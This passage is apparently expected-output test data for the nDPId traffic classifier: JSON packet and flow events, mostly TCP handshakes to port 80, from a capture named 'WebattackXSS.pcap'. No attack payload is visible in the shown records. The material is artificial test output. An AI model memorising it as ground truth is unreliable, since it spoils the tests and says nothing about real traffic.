-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8209,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":2,"flow_last_seen":1499347957283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347957283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhqLwUjy4r\/d0JaAScSBUhgAAAgQFtAQCCAoD5n\/KATyuVgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":3,"flow_last_seen":1499347957283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347957283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02nNAAD4G62SsEAABwKgKMoaiAFCv93Ql8FI8uYAQAOXzjQAAAQEICgE8rlYD5n\/K"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347825732,"flow_last_seen":1499347830847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33096,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347825732,"flow_last_seen":1499347830847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347828369,"flow_last_seen":1499347833848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33122,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347828369,"flow_last_seen":1499347833848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33122,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347829667,"flow_last_seen":1499347834848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347829667,"flow_last_seen":1499347834848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347832201,"flow_last_seen":1499347837849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33162,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347832201,"flow_last_seen":1499347837849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347833462,"flow_last_seen":1499347838849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33176,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347833462,"flow_last_seen":1499347838849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8221,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347958588,"flow_last_seen":1499347958588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347958588,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8221,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1499347958588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347958588,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iDdAAD4GPZmsEAABwKgKMoawAFCTxierAAAAAKACchBruQAAAgQFtAQCCAoBPK+cAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":2,"flow_last_seen":1499347958588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347958588,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhrCsuJaMk8YnrKAScSCkXAAAAgQFtAQCCAoD5oEQATyvnAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":3,"flow_last_seen":1499347958589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347958589,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iDhAAD4GPaCsEAABwKgKMoawAFCTxiesrLiWjYAQAOVDZAAAAQEICgE8r5wD5oEQ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8242,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347961167,"flow_last_seen":1499347961167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347961167,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8242,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":1,"flow_last_seen":1499347961167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347961167,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lndAAD4GL1msEAABwKgKMobKAFDSZyRWAAAAAKACchAtzgAAAgQFtAQCCAoBPLIhAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8243,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":2,"flow_last_seen":1499347961167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347961167,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhsp1SlCg0mckV6AScSDhRgAAAgQFtAQCCAoD5oOVATyyIQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8244,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":3,"flow_last_seen":1499347961168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347961168,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lnhAAD4GL2CsEAABwKgKMobKAFDSZyRXdUpQoYAQAOWATgAAAQEICgE8siED5oOV"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8250,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347962480,"flow_last_seen":1499347962480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347962480,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34520,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8250,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":1,"flow_last_seen":1499347962480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347962480,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OwpAAD4GisasEAABwKgKMobYAFAZTIhjAAAAAKACchCBhgAAAgQFtAQCCAoBPLNpAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8251,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":2,"flow_last_seen":1499347962480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347962480,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhtjOuip1GUyIZKAScSAAcgAAAgQFtAQCCAoD5oTdATyzaQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8252,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":3,"flow_last_seen":1499347962480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347962480,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OwtAAD4Gis2sEAABwKgKMobYAFAZTIhkzroqdoAQAOWfeQAAAQEICgE8s2kD5oTd"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347963774,"flow_last_seen":1499347963774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347963774,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":1,"flow_last_seen":1499347963774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347963774,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82g5AAD4G68GsEAABwKgKMobmAFBdLG6iAAAAAKACchBWFgAAAgQFtAQCCAoBPLSsAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8263,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":2,"flow_last_seen":1499347963774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347963774,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhub+xS4sXSxuo6AScSCf\/AAAAgQFtAQCCAoD5oYgATy0rAEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8264,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":3,"flow_last_seen":1499347963775,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347963775,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02g9AAD4G68isEAABwKgKMobmAFBdLG6j\/sUuLYAQAOU\/AwAAAQEICgE8tK0D5oYg"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8274,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347965133,"flow_last_seen":1499347965133,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347965133,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8274,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":1,"flow_last_seen":1499347965133,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347965133,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KcdAAD4GnAmsEAABwKgKMob0AFDtE5\/HAAAAAKACchCTpwAAAgQFtAQCCAoBPLYAAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8275,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":2,"flow_last_seen":1499347965133,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347965133,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhvTIVjMH7ROfyKAScSANzgAAAgQFtAQCCAoD5od0ATy2AAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8276,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":3,"flow_last_seen":1499347965134,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347965134,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KchAAD4GnBCsEAABwKgKMob0AFDtE5\/IyFYzCIAQAOWs1QAAAQEICgE8tgAD5od0"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8283,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347966420,"flow_last_seen":1499347966420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347966420,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8283,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":1,"flow_last_seen":1499347966420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347966420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U6hAAD4GciisEAABwKgKMocCAFDUQeTqAAAAAKACchBmBgAAAgQFtAQCCAoBPLdCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8284,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":2,"flow_last_seen":1499347966420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347966420,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhwJV63ns1EHk66AScSAKcQAAAgQFtAQCCAoD5oi2ATy3QgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8285,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":3,"flow_last_seen":1499347966420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347966420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0U6lAAD4Gci+sEAABwKgKMocCAFDUQeTrVet57YAQAOWpeAAAAQEICgE8t0ID5oi2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347967724,"flow_last_seen":1499347967724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967724,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1499347967724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347967724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JnBAAD4Gn2CsEAABwKgKMocQAFDWSp74AAAAAKACchComwAAAgQFtAQCCAoBPLiIAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":2,"flow_last_seen":1499347967725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347967725,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhxDJR2HM1kqe+aAScSDwgwAAAgQFtAQCCAoD5on8ATy4iAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":3,"flow_last_seen":1499347967725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347967725,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JnFAAD4Gn2esEAABwKgKMocQAFDWSp75yUdhzYAQAOWPiwAAAQEICgE8uIgD5on8"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347836095,"flow_last_seen":1499347841850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347836095,"flow_last_seen":1499347841850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347837373,"flow_last_seen":1499347842851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33216,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347837373,"flow_last_seen":1499347842851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33216,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347838675,"flow_last_seen":1499347843851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33230,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347838675,"flow_last_seen":1499347843851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33230,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347841229,"flow_last_seen":1499347846856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33256,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 